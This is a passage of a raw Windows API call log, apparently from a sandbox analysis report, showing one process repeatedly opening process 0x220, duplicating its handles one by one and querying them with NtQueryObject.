bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.376] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x32c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.376] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.377] CloseHandle (hObject=0x1b8) returned 1 [0113.377] CloseHandle (hObject=0x198) returned 1 [0113.377] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.377] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x330, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.386] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.387] CloseHandle (hObject=0x1b8) returned 1 [0113.387] CloseHandle (hObject=0x198) returned 1 [0113.387] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.387] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x334, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.387] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.387] CloseHandle (hObject=0x1b8) returned 1 [0113.387] CloseHandle (hObject=0x198) returned 1 [0113.387] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.387] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x338, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.388] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.388] CloseHandle (hObject=0x1b8) returned 1 [0113.388] CloseHandle (hObject=0x198) returned 1 [0113.388] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.388] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x33c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.388] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.388] CloseHandle (hObject=0x1b8) returned 1 [0113.389] CloseHandle (hObject=0x198) returned 1 [0113.389] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.389] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x340, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.389] CloseHandle (hObject=0x198) returned 1 [0113.389] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.389] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x344, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.389] CloseHandle (hObject=0x198) returned 1 [0113.389] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.389] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x348, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.390] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.390] CloseHandle (hObject=0x1b8) returned 1 [0113.390] CloseHandle (hObject=0x198) returned 1 [0113.390] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.390] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x34c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.390] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.390] CloseHandle (hObject=0x1b8) returned 1 [0113.391] CloseHandle (hObject=0x198) returned 1 [0113.391] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.391] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x350, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.391] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.391] CloseHandle (hObject=0x1b8) returned 1 [0113.391] CloseHandle (hObject=0x198) returned 1 [0113.391] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.391] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x354, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.391] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.392] CloseHandle (hObject=0x1b8) returned 1 [0113.392] CloseHandle (hObject=0x198) returned 1 [0113.392] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.392] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x358, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.393] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.393] CloseHandle (hObject=0x1b8) returned 1 [0113.394] CloseHandle (hObject=0x198) returned 1 [0113.394] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.394] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x35c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.394] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.394] CloseHandle (hObject=0x1b8) returned 1 [0113.394] CloseHandle (hObject=0x198) returned 1 [0113.394] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.394] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x360, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.394] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.395] CloseHandle (hObject=0x1b8) returned 1 [0113.395] CloseHandle (hObject=0x198) returned 1 [0113.395] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.395] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x364, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.395] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.395] CloseHandle (hObject=0x1b8) returned 1 [0113.396] CloseHandle (hObject=0x198) returned 1 [0113.396] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.396] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x368, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.396] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.396] CloseHandle (hObject=0x1b8) returned 1 [0113.396] CloseHandle (hObject=0x198) returned 1 [0113.396] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.396] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.396] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.397] CloseHandle (hObject=0x1b8) returned 1 [0113.397] CloseHandle (hObject=0x198) returned 1 [0113.397] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.397] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x370, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.397] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.397] CloseHandle (hObject=0x1b8) returned 1 [0113.397] CloseHandle (hObject=0x198) returned 1 [0113.397] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.397] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x374, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.397] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.398] CloseHandle (hObject=0x1b8) returned 1 [0113.398] CloseHandle (hObject=0x198) returned 1 [0113.398] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.398] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x378, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.398] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.398] CloseHandle (hObject=0x1b8) returned 1 [0113.398] CloseHandle (hObject=0x198) returned 1 [0113.398] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.398] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x37c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.399] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.399] CloseHandle (hObject=0x1b8) returned 1 [0113.399] CloseHandle (hObject=0x198) returned 1 [0113.399] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.399] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x380, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.399] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.399] CloseHandle (hObject=0x1b8) returned 1 [0113.399] CloseHandle (hObject=0x198) returned 1 [0113.399] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.400] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x384, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.400] CloseHandle (hObject=0x198) returned 1 [0113.400] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.400] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x388, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.400] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.400] CloseHandle (hObject=0x1b8) returned 1 [0113.400] CloseHandle (hObject=0x198) returned 1 [0113.400] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.400] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x38c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.401] CloseHandle (hObject=0x198) returned 1 [0113.401] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.401] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x390, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.401] CloseHandle (hObject=0x198) returned 1 [0113.401] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.401] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x394, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.401] CloseHandle (hObject=0x198) returned 1 [0113.401] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.401] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x398, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.402] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.402] CloseHandle (hObject=0x1b8) returned 1 [0113.402] CloseHandle (hObject=0x198) returned 1 [0113.402] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.402] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x39c, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.402] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.402] CloseHandle (hObject=0x1b8) returned 1 [0113.403] CloseHandle (hObject=0x198) returned 1 [0113.403] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.403] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3a0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.403] CloseHandle (hObject=0x198) returned 1 [0113.403] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.403] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3a4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.403] CloseHandle (hObject=0x198) returned 1 [0113.404] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.404] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3a8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.404] CloseHandle (hObject=0x198) returned 1 [0113.404] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.404] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3ac, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.404] CloseHandle (hObject=0x198) returned 1 [0113.404] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.404] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.405] CloseHandle (hObject=0x198) returned 1 [0113.405] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.405] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.405] CloseHandle (hObject=0x198) returned 1 [0113.405] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.405] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.406] CloseHandle (hObject=0x198) returned 1 [0113.406] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.406] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.406] CloseHandle (hObject=0x198) returned 1 [0113.406] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.406] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.406] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.406] CloseHandle (hObject=0x1b8) returned 1 [0113.407] CloseHandle (hObject=0x198) returned 1 [0113.407] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.407] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.407] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.407] CloseHandle (hObject=0x1b8) returned 1 [0113.407] CloseHandle (hObject=0x198) returned 1 [0113.407] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.407] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3c8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.407] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.408] CloseHandle (hObject=0x1b8) returned 1 [0113.408] CloseHandle (hObject=0x198) returned 1 [0113.408] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.408] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3cc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.408] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.408] CloseHandle (hObject=0x1b8) returned 1 [0113.408] CloseHandle (hObject=0x198) returned 1 [0113.408] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.408] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.409] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.409] CloseHandle (hObject=0x1b8) returned 1 [0113.409] CloseHandle (hObject=0x198) returned 1 [0113.409] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.409] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3d4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.409] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.409] CloseHandle (hObject=0x1b8) returned 1 [0113.410] CloseHandle (hObject=0x198) returned 1 [0113.410] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.410] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3d8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.410] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.410] CloseHandle (hObject=0x1b8) returned 1 [0113.410] CloseHandle (hObject=0x198) returned 1 [0113.410] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.410] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3dc, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x0) returned 0 [0113.411] CloseHandle (hObject=0x198) returned 1 [0113.411] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.411] DuplicateHandle (in: hSourceProcessHandle=0x198, hSourceHandle=0x3e0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0xce8c8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0xce8c8*=0x1b8) returned 1 [0113.411] NtQueryObject (in: Handle=0x1b8, ObjectInformationClass=0x0, ObjectInformation=0xce890, ObjectInformationLength=0x38, ReturnLength=0xce88c | out: ObjectInformation=0xce890, ReturnLength=0xce88c) returned 0x0 [0113.411] CloseHandle (hObject=0x1b8) returned 1 [0113.411] CloseHandle (hObject=0x198) returned 1 [0113.411] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x220) returned 0x198 [0113.411] DuplicateHandle (in: hSourceProcessHandle=0x198, 